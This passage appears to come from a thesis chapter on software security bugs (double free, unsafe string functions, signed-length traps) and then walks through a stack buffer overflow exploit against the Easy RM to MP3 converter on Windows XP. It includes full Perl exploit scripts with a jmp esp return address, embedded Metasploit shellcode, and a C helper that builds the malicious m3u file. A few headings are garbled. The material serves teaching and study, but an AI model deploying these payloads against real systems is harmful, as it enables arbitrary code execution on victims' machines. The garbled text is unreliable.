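/* 0 if p was live and is now freed; -1 if p is not a live allocation, i.e.
 * it was never allocated here or has already been freed (a double free).
 * Refusing the second free is what keeps the allocator's bookkeeping intact. */
int tracked_free(void *p)
{
    int i;
    for (i = 0; i < live_count; i++) {
        if (live[i] == p) {
            live[i] = live[--live_count];  /* remove from table, then release */
            free(p);
            return 0;
        }
    }
    return -1;
}

int live_allocations(void) { return live_count; }

/* The bug as the text describes it: free() called twice with the same
 * address.  Returns how many of the calls the wrapper rejected. */
int double_free_scenario(void)
{
    int rejected = 0;
    char *buf = tracked_malloc(32);
    if (buf == NULL)
        return -1;
    if (tracked_free(buf) != 0) rejected++;
    if (tracked_free(buf) != 0) rejected++;   /* same pointer again */
    return rejected;
}

/* Mitigation in ordinary code: free and clear through the pointer's address.
 * Returns 1 if memory was released, 0 if the pointer was already NULL. */
int free_and_clear(void **pp)
{
    if (*pp == NULL)
        return 0;
    free(*pp);
    *pp = NULL;
    return 1;
}

/* Two frees of the same variable: only the first one reaches free(). */
int cleared_pointer_scenario(void)
{
    void *p = malloc(32);
    int released = 0;
    if (p == NULL)
        return -1;
    released += free_and_clear(&p);
    released += free_and_clear(&p);   /* p is NULL now: nothing happens */
    return released;
}

int main(void)
{
    printf("double free rejected %d time(s)\n", double_free_scenario());
    printf("cleared pointer: free() reached %d time(s)\n",
           cleared_pointer_scenario());
    return 0;
}
```

The table lookup is linear and only meant to make the rule visible; production allocators do the same kind of check with per-chunk metadata, which is exactly the metadata the text says a double free corrupts when no such check exists.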
Conclusion of Chapter II
Chapter II presented the concepts of software bug and software security bug. In this chapter we examined some common software security bugs: stack-based buffer overflow, heap-based buffer overflow, and double free.
We focused mainly on analysing the stack-based buffer overflow, which is the most common and also the easiest bug to exploit today. The most important thing about this bug is being able to overwrite EIP in order to control the flow of execution, that is, to point it at the piece of code we want to execute. In the next chapter we will study how to find the bug and the steps for exploiting it.

CHNG III. CC K THUT TM


LI V CC BC KHAI THC
LI BO MT PHN MM
1.1.
2.1.
3.1.

TM V PHT HIN LI

3.1.1. Vai tr l lp trnh vin


Vi lp trnh vin vic tm li ph thuc ln vo kinh nghim lp trnh ca h. H tm li ch yu bng
vic kim tra m ngun ca phn mm. Vi mt lp trnh vin c kinh nghim h tp trung vo cc
hm m c nguy c pht sinh li cao. Mt s hm m chng ta bit l : strcat, strcpy, strncat, strncpy,
sprintf, vsprintf, gets Hoc mt s cu trc c th gy li
Chng ta cng xem xt 3 hm: strcpy, strncpy, v strlcpy

Hnh 3.1: strcpy, strncpy, v strlcpy

Hm strcpy ghi chui vo b nh v n ghi ln bt k d liu g ng sau n. Nu chui m n ghi


vo ln hn b nh m n khai bo th phn d liu tha s c ghi ln phn b nh ngay sau .
iu ny gy ln li trn b m.
Vi hm strncpy s ch ghi d liu va ng vi b nh c cp, song n khng c k t kt thc
chui. iu ny dn ti vic khi chui ny c c th cc bytes d liu ng sau cng c th b c
ra.
Vi hm strlcpy th hon ton an ton bi n t ng thm vo k t kt thc ng sau.
Bng sau y s lit k cc hm tng t nh trn:
HM KHNG NN DNG

HM NN DNG

Strcat

Strlcat

Strcpy

Strlcpy

Strncat

Strlcat

Strncpy

Strlcpy

Sprintf

Snprintf hoc asprintf

Vsprintf

vsnprintf hoc vasprintf

Gets

fgets

Some code patterns also lead to buffer overflows:

DO NOT USE:
    char buf[1024];
    if (size <= 1023) {

USE:
    #define BUF_SIZE 1024
    char buf[BUF_SIZE];
    if (size < BUF_SIZE) {

DO NOT USE:
    char buf[1024];
    if (size < 1024) {

USE:
    char buf[1024];
    if (size < sizeof(buf)) {

Using the sizeof operator to compute the buffer size avoids errors compared with hard-coding the number: if the buffer's size is changed later, the hard-coded check on the left no longer matches the declaration and the code becomes vulnerable, while the sizeof version follows the declaration automatically.
A further point is the use of signed integers:
0x7fffffff = 2147483647, but
0x80000000 = -2147483648
so for a 32-bit int, 2147483647 + 1 does not give 2147483648; the result wraps to -2147483648 (signed overflow is undefined behaviour in C, and in practice the value wraps). A length that has gone negative this way, or that an attacker supplies as a negative number, passes a check such as size <= 1023 and is then converted to a very large unsigned value when handed to memcpy or strncpy.
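The three points above (strcpy/strncpy/strlcpy, the sizeof-based bound check and the signed-length trap) in one runnable C program, added here as an example; it is not code from the thesis. The strlcpy is our own portable re-implementation (named my_strlcpy) because older glibc lacks the BSD function, and all input strings are constructed for the demonstration:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Portable re-implementation of BSD strlcpy (this helper is ours; glibc only gained
   strlcpy in 2.38). Copies at most dst_size-1 bytes and always NUL-terminates when
   dst_size > 0. Returns strlen(src) so the caller can detect truncation. */
size_t my_strlcpy(char *dst, const char *src, size_t dst_size)
{
    size_t src_len = strlen(src);
    if (dst_size != 0) {
        size_t n = src_len < dst_size - 1 ? src_len : dst_size - 1;
        memcpy(dst, src, n);
        dst[n] = '\0';
    }
    return src_len;
}

/* Returns 1 when strncpy left dst without a terminator: that happens whenever
   strlen(src) >= n, and a later strlen/strcpy/printf("%s") then reads past dst. */
int strncpy_leaves_unterminated(const char *src, size_t n)
{
    char dst[64];
    if (n > sizeof dst) return -1;
    memset(dst, 'X', sizeof dst);          /* poison so a missing '\0' is visible */
    strncpy(dst, src, n);
    return memchr(dst, '\0', n) == NULL;
}

/* The signed-length trap: a negative len passes "len <= max" ... */
int signed_check_passes(int len, int max)
{
    return len <= max;
}

/* ... and is then converted to a huge size_t by memcpy. The correct check rejects
   anything outside [0, buf_size-1]; the -1 keeps one byte for the terminator. */
int copy_checked(char *buf, size_t buf_size, const char *src, long len)
{
    if (len < 0 || (size_t)len >= buf_size) return -1;   /* reject, nothing copied */
    memcpy(buf, src, (size_t)len);
    buf[len] = '\0';
    return 0;
}

/* 0x7fffffff + 1 on a 32-bit two's-complement int does not give 2147483648:
   the bit pattern 0x80000000 reads back as -2147483648. Computed through uint32_t
   because signed overflow itself is undefined behaviour in C. */
int32_t wraps_to_negative(void)
{
    uint32_t x = 0x7fffffffu;
    x += 1;                 /* 0x80000000 */
    return (int32_t)x;      /* INT32_MIN on every mainstream compiler */
}

/* Small drivers so the behaviours can be checked without a debugger. */
int copy_checked_demo(long len)
{
    char buf[8];
    return copy_checked(buf, sizeof buf, "ABCDEFGHIJ", len);  /* constructed input */
}

int strlcpy_truncation_detected(void)
{
    char dst[4];
    size_t needed = my_strlcpy(dst, "hello", sizeof dst);     /* constructed input */
    return needed >= sizeof dst && strcmp(dst, "hel") == 0;   /* truncated, but terminated */
}

int main(void)
{
    printf("strncpy(\"ABCDEFGH\", 8) left dst unterminated: %d\n",
           strncpy_leaves_unterminated("ABCDEFGH", 8));
    printf("len = -1 passes 'len <= 1023': %d\n", signed_check_passes(-1, 1023));
    printf("copy_checked with len = -1: %d (rejected)\n", copy_checked_demo(-1));
    printf("0x7fffffff + 1 read as int32: %d\n", (int)wraps_to_negative());
    return 0;
}
```

The point of copy_checked is the order of the tests: the sign is checked before the cast to size_t, because once a negative int has been converted the "< buf_size" comparison is already lost.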
3.1.2. As a tester
Testers find software flaws using test cases: situations defined for the software that the tester can try directly against it.
The test cases differ from program to program, but in general the tester feeds different values to the program's inputs and evaluates the outputs, checking whether each output is the expected one.
A concrete example is testing a login form whose input consists of two fields, username and password.
In this example the tester passes different values into the two fields and records the results. For instance:
No.  Username                     Password                 Expected result
1    any value                    empty                    login fails
2    empty                        any value                login fails
3    numeric only                 any value                login fails
4    contains special characters  any value                login fails
5    present in the database      matching password        login succeeds
6    present in the database      non-matching password    login fails
7    not in the database          any value                login fails

3.1.3. As a hacker

To find out whether a program is vulnerable, hackers typically feed large amounts of data to its inputs. If the program has a flaw, an error message appears or the program crashes. The following example shows how hackers detect such a flaw, using the Easy RM to MP3 converter installed on Windows XP. The steps are:
Step 1: First, confirm that the application really crashes when opening an m3u file, or hangs when opening specifically crafted data.
We use a small Perl[12] script to create the file crash.m3u, which will help us gather more information about the vulnerability:
my $file = "crash.m3u";
my $junk = "\x41" x 10000;
open($FILE, ">$file");
print $FILE $junk;
close($FILE);
print "m3u File Created successfully\n";
Running this script creates an m3u file filled with 10000 'A' characters (\x41 is the hexadecimal code of 'A'). Open it with Easy RM to MP3: the application shows an ordinary error message, the exception appears to be handled correctly, and the application does not crash:

Figure 3.2: The application does not crash

Step 2: Change the script to 20000 A's and try again; the result is the same (the exception is still handled correctly, and we have not yet obtained any useful information about what happens behind it). Now try 30000 A's and open the file:

Figure 3.3: The application crashes

So the application crashes when the file holds between 20000 and 30000 A's: it has a stack-based buffer overflow.
Conclusion: clearly, not every application that crashes can be exploited. In many cases a crash does not lead to an exploit, but some do. With an exploit we make the application do something it was not designed to do, such as running code of our choosing. The simplest way to make it do something else is to control the application flow. This can be done by controlling the Instruction Pointer (Program Counter), the CPU register that holds the address of the next instruction to be executed.
Suppose the application calls a function with a parameter. Before jumping to the function it saves its current location (usually known as the return address, where execution resumes when the function finishes). If you can change this saved value so that it points to another place in memory that contains your code, you change the application's flow and make it execute something else instead of returning to the original location. The code you want executed once you control this pointer is usually called shellcode.

So if we make the application run our shellcode, we can call it an exploit. In most cases this pointer is referenced by the EIP register, which is 4 bytes long. If you can change those 4 bytes, you control the application, and the computer that runs it, with the privileges of that process.
3.2. STEPS FOR EXPLOITING THE FLAW

This section covers the steps for exploiting a stack-based buffer overflow. There are typically five steps; each is described in detail below.
3.2.1. Attaching the program to a debugger[13]
To see the state of the stack (and the register values, such as the stack pointer and the instruction pointer) we need to attach a debugger to the application, so that we can observe what happens while it runs, and especially when it dies. Several debuggers suit this purpose, among them WinDbg and Immunity Debugger.
We continue with the example from the section on finding the stack-based overflow:
Run Easy RM to MP3 and open crash.m3u again. The application crashes again, this time with the debugger attached.

Figure 3.4: The WinDbg interface

Figure 3.5: The Immunity Debugger interface

Both show roughly the same information, only presented differently. In the Immunity Debugger window above, the top-left pane is the CPU view showing assembly code; it is empty because EIP currently points to 41414141 ("AAAA"), an invalid address. Top-right are the registers, bottom-right is the contents of the stack.
So it looks as if part of the m3u file was read into a buffer and overflowed it: we overflowed the buffer and overwrote the saved instruction pointer, which means we control the EIP register.
Because the file contains only A's, we do not know exactly how large the buffer is, i.e. at which position the saved return address is overwritten. In other words, to overwrite EIP (and make it jump to our code) we must know the exact position in the buffer/payload at which the return address gets written. That position is usually called the offset.

3.2.2. Determining the exact position of EIP in the buffer

The purpose of this step is to find the exact position at which the saved EIP sits in our buffer. We continue with the example above to show how it is done.

We know that EIP is overwritten somewhere between byte 20000 and byte 30000 of the buffer. You could fill the whole range between 20000 and 30000 with the address you want in EIP. That works, but it is better to find the exact position. To determine the offset of EIP in the buffer we do some extra work:
First we narrow the range by changing the Perl script to write 25000 A's followed by 5000 B's. If EIP then contains 41414141, the offset lies between 20000 and 25000; if it contains 42424242, it lies between 25000 and 30000.
my $file = "crash25000.m3u";
my $junk = "\x41" x 25000;
my $junk2 = "\x42" x 5000;
open($FILE, ">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";
Create the file and open crash25000.m3u with Easy RM to MP3:

Figure 3.6: EIP contains 42424242 (BBBB)

EIP contains 42424242 (BBBB), so the offset lies between 25000 and 30000.

Figure 3.7: Contents of the buffer after Easy RM to MP3 crashes

Figure 3.8: Contents of ESP

We have overwritten EIP with BBBB and can see our buffer at ESP.
We now need the exact position in the buffer that overwrites EIP. For that we use Metasploit.
Metasploit is a good tool for computing the offset: it generates strings made of unique patterns. Using such a pattern in the m3u file, and reading the value of EIP after the crash, tells us how long the buffer is before EIP is overwritten.
Open the tools directory of Metasploit Framework 3; there you find the script pattern_create.rb. Create a pattern of 5000 characters and write it to a file:
root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb 5000
Change the Perl script and replace $junk2 with the 5000 pattern characters:

my $file = "crash25000.m3u";
my $junk = "\x41" x 25000;
my $junk2 = "put the 5000 characters here";
open($FILE, ">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";
Create the .m3u file and open it with Easy RM to MP3. Wait for the application to die and look at the contents of EIP:

Figure 3.9: Contents of EIP after the crash

This time EIP contains 0x356b4234.
Now we use Metasploit's second tool to compute the exact length of the buffer before EIP, i.e. the position of EIP within the pattern:
root@bt:/pentest/exploits/framework3/tools# ./pattern_offset.rb 0x356b4234 5000
1094
The result is 1094: the 4 bytes at offset 1094 of the pattern landed in EIP (read as a little-endian dword, 0x356b4234 is the bytes 34 42 6b 35, i.e. the characters "4Bk5"). So if you create a file with 25000+1094 A's followed by 4 B's (42424242), EIP will contain 42424242. Because EIP will later have to point into data in our buffer, we append some C's after the EIP overwrite.
Change the script to create the new m3u file:
my $file = "eipcrash.m3u";
my $junk = "A" x 26094;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE, ">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created successfully\n";
Create eipcrash.m3u, open it with Easy RM to MP3 and look at the contents of ESP:

Figure 3.10: EIP contains BBBB

Figure 3.11: ESP holds the address 000ff730

EIP now contains BBBB, exactly what we wanted: we control EIP. On top of that, ESP points into our buffer (the C's).
Our exploit buffer will look like this:

Figure 3.12: Layout of the exploit buffer
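The pattern_create/pattern_offset step above, re-implemented in C as an added example (this is not code from the thesis or from Metasploit; it reproduces the same cyclic pattern so that the offsets match the tool's output). It also shows the little-endian packing that Perl's pack("V", ...) performs and builds the file body in the layout the text settles on, [junk][EIP][4 filler bytes][payload]; the 26094/0x01ccf23a/"XXXX" values are the ones from the text:

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Metasploit-style cyclic pattern: triples of (upper, lower, digit), so every
   4-byte window is unique within the first 26*26*10*3 = 20280 bytes. */
size_t pattern_create(char *out, size_t len)
{
    size_t pos = 0;
    for (char a = 'A'; pos < len && a <= 'Z'; a++)
        for (char b = 'a'; pos < len && b <= 'z'; b++)
            for (char c = '0'; pos < len && c <= '9'; c++) {
                char trip[3] = { a, b, c };
                for (int i = 0; i < 3 && pos < len; i++)
                    out[pos++] = trip[i];
            }
    out[pos] = '\0';          /* caller provides len + 1 bytes */
    return pos;
}

/* Same as Perl pack("V", v): 32-bit little-endian. The debugger shows EIP as a
   little-endian load of 4 pattern bytes, so 0x356b4234 means the bytes 34 42 6b 35
   ("4Bk5") sat in the return-address slot. */
void pack_v(uint32_t v, unsigned char out[4])
{
    out[0] = v & 0xff;         out[1] = (v >> 8) & 0xff;
    out[2] = (v >> 16) & 0xff; out[3] = (v >> 24) & 0xff;
}

/* Offset of the 4 bytes that ended up in EIP inside a pattern of pat_len bytes, or -1. */
long pattern_offset(uint32_t eip, size_t pat_len)
{
    char *pat = malloc(pat_len + 1);
    if (!pat) return -1;
    pattern_create(pat, pat_len);
    unsigned char needle[4];
    pack_v(eip, needle);
    long found = -1;
    for (size_t i = 0; i + 4 <= pat_len; i++)
        if (memcmp(pat + i, needle, 4) == 0) { found = (long)i; break; }
    free(pat);
    return found;
}

/* File body: [junk A's][EIP][prefix][payload]. Returns NULL on allocation failure;
   the caller frees the result. */
unsigned char *build_m3u(size_t junk_len, uint32_t eip, const char *prefix,
                         const unsigned char *payload, size_t payload_len, size_t *out_len)
{
    size_t prefix_len = strlen(prefix);
    size_t total = junk_len + 4 + prefix_len + payload_len;
    unsigned char *buf = malloc(total);
    if (!buf) return NULL;
    memset(buf, 'A', junk_len);
    pack_v(eip, buf + junk_len);
    memcpy(buf + junk_len + 4, prefix, prefix_len);
    memcpy(buf + junk_len + 4 + prefix_len, payload, payload_len);
    *out_len = total;
    return buf;
}

/* Self-check: the EIP bytes must sit at offset junk_len, little-endian, and the
   payload right after the 4 filler bytes. */
int build_m3u_places_eip(void)
{
    size_t n;
    unsigned char expect[4];
    unsigned char *b = build_m3u(26094, 0x01ccf23a, "XXXX", (const unsigned char *)"\xcc", 1, &n);
    if (!b) return 0;
    pack_v(0x01ccf23a, expect);
    int ok = n == 26094 + 4 + 4 + 1 && memcmp(b + 26094, expect, 4) == 0 && b[26094 + 8] == 0xcc;
    free(b);
    return ok;
}

int main(void)
{
    printf("offset of 0x356b4234 in a 5000-byte pattern: %ld\n", pattern_offset(0x356b4234, 5000));
    /* 25 NOPs, int3, 25 NOPs: the test payload used in the text. */
    unsigned char payload[51];
    memset(payload, 0x90, sizeof payload);
    payload[25] = 0xcc;
    size_t n;
    unsigned char *body = build_m3u(26094, 0x01ccf23a, "XXXX", payload, sizeof payload, &n);
    FILE *f = fopen("test1.m3u", "wb");
    if (f && body) { fwrite(body, 1, n, f); fclose(f); printf("wrote %zu bytes\n", n); }
    free(body);
    return 0;
}
```

Run it and pattern_offset reports 1094 for 0x356b4234, the value pattern_offset.rb printed in the text. Note that the file is written in binary mode: a text-mode write on Windows would translate any 0x0a byte inside the EIP address or shellcode and shift every offset.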


3.2.3. Finding memory space to hold the shellcode
We control EIP; now we want to point it at a place that holds our code (the shellcode). But in the space we have, where can we put the shellcode and how do we make EIP jump to it? We continue with the example to make this clear.
To crash the application we wrote 26094 A's into memory, then a new value into EIP, then a series of C's.
When the application crashes, look at the registers and dump them (with d esp, d eax, d ebx and so on): you will see your buffer (only A's and C's), and you can then replace it with shellcode and jump there. In our example ESP points to the C's (check with d esp), so the idea is to put the shellcode where the C's are and have EIP point there.
Although we see C's, we do not know whether the C at address 000ff730 is the first C we put in the buffer. So we change the Perl script to use a marker pattern instead of the C's; here it is 144 characters long (it could be more or fewer):
my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = "BBBB";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
  "5ABCDEFGHIJK6ABCDEFGHIJK" .
  "7ABCDEFGHIJK8ABCDEFGHIJK" .
  "9ABCDEFGHIJKAABCDEFGHIJK" .
  "BABCDEFGHIJKCABCDEFGHIJK";
open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
Create the file, open it and look at ESP:

Figure 3.13: ESP starts at the 5th character

You will notice two interesting things:

ESP starts at the 5th character of our pattern, not at the first.

After the end of the pattern you see A's again; these belong to the A's at the beginning of the buffer, so shellcode could also be placed at the start of the buffer.

We add 4 characters before the pattern and check again; ESP should now point to the first character of the pattern:
my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = "BBBB";
my $preshellcode = "XXXX";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
  "5ABCDEFGHIJK6ABCDEFGHIJK" .
  "7ABCDEFGHIJK8ABCDEFGHIJK" .
  "9ABCDEFGHIJKAABCDEFGHIJK" .
  "BABCDEFGHIJKCABCDEFGHIJK";
open($FILE, ">$file");
print $FILE $junk.$eip.$preshellcode.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
The application crashes again; look at ESP:

Figure 3.14: ESP points to the first character of the pattern

We now have:

Control of EIP.

An area where we can put shellcode (144 bytes here; in reality it is much larger).

A register that points directly to our code, at address 0x000ff730.

We need:

Real shellcode.

To make EIP point to the start of the shellcode. That can be done by overwriting EIP with the address 0x000ff730.

Let us try the simple case first: overwrite EIP with 000ff730, followed by 25 NOPs[14] (\x90), a breakpoint (\xcc) and 25 more NOPs. If it works, EIP jumps to 0x000ff730, runs through the NOPs and stops at the breakpoint.
my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = pack("V", 0x000ff730);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode . "\xcc";
$shellcode = $shellcode . "\x90" x 25;
open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
The application crashes. EIP contains 0x000ff730, but when we dump ESP we do not see what we expected.

Figure 3.15: EIP contains 000ff730

Jumping directly to an address is not a good method: 000ff730 contains a null byte, the string terminator, so the bytes after it are never copied into the buffer (note also that this script omits the 4 XXXX bytes that were needed above to line ESP up with the start of the pattern). Besides, a hard-coded jump address is unreliable: it depends on the operating system version, its language and the environment. So how do we jump to the shellcode reliably? That is the next step.
3.2.4. Jumping to the shellcode reliably
We have placed the buffer exactly at the point ESP points to; in other words, ESP points to the start of the shellcode. If that were not the case, we would examine the contents of the other registers and hope that one of them points into the buffer. In this example we use ESP.

Jumping to ESP is a very common technique in Windows applications. Windows applications use one or more DLLs, and these DLLs contain a great deal of code. Moreover, the addresses a DLL is loaded at are static (Windows XP has no ASLR). So if we find a DLL that contains an instruction jumping to ESP, we can overwrite EIP with the address of that instruction.
First we need the opcode[15] for jmp esp.
Open Easy RM to MP3, then open WinDbg and attach it to the Easy RM to MP3 process. Do nothing with Easy RM to MP3; attaching lets WinDbg show which modules (DLLs) the application has loaded.

Figure 3.16: Attaching WinDbg to Easy RM to MP3

When the debugger attaches, the application breaks.
On the WinDbg command line, type a (assemble) and press Enter.
Then type jmp esp and press Enter.
Then type u (unassemble) followed by the address that was shown before you typed jmp esp.

Figure 3.17: ff e4 is the opcode of jmp esp

At 7c90120e you see ff e4: that is the opcode of jmp esp. Now we look for this opcode in the loaded DLLs:
ModLoad: 774e0000 7761d000   C:\WINDOWS\system32\ole32.dll
ModLoad: 10000000 10071000   C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll
ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 00ce0000 00d7f000   C:\Program Files\Easy RM to MP3 Converter\MSRMfilter01.dll
ModLoad: 01a90000 01b01000   C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec00.dll
ModLoad: 00c80000 00c87000   C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec01.dll
ModLoad: 01b10000 01fdd000   C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll
ModLoad: 01fe0000 01ff1000
ModLoad: 77120000 771ab000
C:\WINDOWS\system32\MSVCIRT.dll
C:\WINDOWS\system32\OLEAUT32.dll

If we find the opcode in one of the application's own DLLs, there is a good chance the exploit works on every Windows version. If we find it in a DLL that belongs to the operating system, the exploit will usually only work on that OS version (service pack and language). So we look at the Easy RM to MP3 DLLs first:
Take C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll, loaded between 01b10000 and 01fdd000, and search that range for ff e4:
s 01b10000 l 01fdd000 ff e4
When choosing an address, watch out for NULL BYTES. Avoid addresses containing a null byte: it terminates the string, and the data after it cannot be used.
Another way is to search a whole address range for the opcode:
s 70000000 l fffffff ff e4
There are several other ways to find the address of an opcode:
Findjmp (Ryan Permeh): compile findjmp.c and run it with the right parameters.
The Metasploit opcode database.
Memdump.
pvefindaddr, a plugin for Immunity Debugger.
Because we want to put the shellcode at ESP (and have EIP point there afterwards), the jmp esp address must not contain a null byte. We take the first address found: 0x01ccf23a.
Check that this address holds jmp esp:

Figure 3.18: The jmp esp opcode in the DLL

If you overwrite EIP with 0x01ccf23a, jmp esp is executed. ESP contains our shellcode, so we have a working exploit. Test it with the NOP/breakpoint code:
Close WinDbg. Create an m3u file with this script:
my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = pack("V", 0x01ccf23a);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode . "\xcc";
$shellcode = $shellcode . "\x90" x 25;
open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
The result:

Figure 3.19: Result of the test with the NOP/breakpoint code

Run the application again, attach WinDbg, press g to continue, and open the m3u file with the application.
The application breaks at 000ff745, which means jmp esp worked (ESP started at 000ff730, but that area holds NOPs, so execution ran on to 000ff744 before reaching the breakpoint). All that remains is to put in real shellcode.
Many techniques for jumping to shellcode exist; they are described in more detail in section 3.3. Which one to use depends on the situation.
3.2.5. Obtaining shellcode to finish the exploit
This is the last step of the exploitation process: choosing suitable shellcode.
Metasploit provides many payloads[16] for building exploits. Payloads have different options and, depending on what we need, can be very small or very large. If the buffer space is limited, you can use multi-staged shellcode, or hand-written shellcode (for example the 32-byte cmd.exe shellcode for XP SP2 EN). You can also split the shellcode into parts called eggs and reassemble it with an egg-hunting technique.
The Perl script becomes:
my $file = "exploitrmtomp3.m3u";
my $junk = "A" x 26094;
my $eip = pack("V", 0x01ccf23a);
my $shellcode = "\x90" x 25;
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode .
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
First, turn off the debugger auto-popup setting in the registry. Then create the m3u file and open it with the application:
We have our first exploit.

Figure 3.20: Successful exploitation

3.3. TECHNIQUES FOR JUMPING TO THE SHELLCODE

Jumping to the shellcode is the most important part of exploiting a software flaw; it decides whether the exploitation succeeds. There are many ways to jump to the shellcode, and the right one depends on the situation. This section examines them one by one.
3.3.1. jump (or call) register
Jump (or call) a register that points directly to the shellcode. With this technique you use a register that contains an address pointing to the shellcode, and you put into EIP the address of an instruction that jumps to that register. You look for the opcode of a jump or call to that register in the DLLs of the running application. When you build the payload, instead of overwriting EIP with a memory address you overwrite it with the address of the "jump to register" instruction. Obviously this only works when the register actually contains an address that points to the shellcode. This is the method used in the previous section.
If a register contains an address that points directly to the shellcode, you can use call reg or jmp reg to get there. In other words, if ESP points directly to the shellcode (the first byte of the shellcode is the byte at ESP), you can overwrite EIP with the address of a call esp instruction and the shellcode is executed. This works with every register, and kernel32.dll contains many call reg / jmp reg instructions (with the caveat from section 3.2.4: an address in an OS DLL ties the exploit to that Windows version).

Example: assume ESP points directly to the shellcode. First find an opcode containing call esp; we use findjmp:
findjmp.exe kernel32.dll esp
Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
Scanning kernel32.dll for code useable with the esp register
0x7C836A08    call esp
0x7C874413    jmp esp
Finished Scanning kernel32.dll for code useable with the esp register
Found 2 usable addresses
Next we overwrite EIP with the address 0x7C836A08.
In the earlier Easy RM to MP3 example we found that ESP can be made to point at the shellcode by adding 4 characters between EIP and ESP, so the exploit becomes:
my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = pack("V", 0x7C836A08);
my $prependesp = "XXXX";
my $shellcode = "\x90" x 25;
# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .
"\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" .
"\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" .
"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" .
"\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" .
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" .
"\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" .
"\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" .
"\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" .
"\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" .
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" .
"\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" .
"\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" .
"\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" .
"\x31\x42\x4c\x42\x43\x45\x50\x41\x41";
open($FILE, ">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
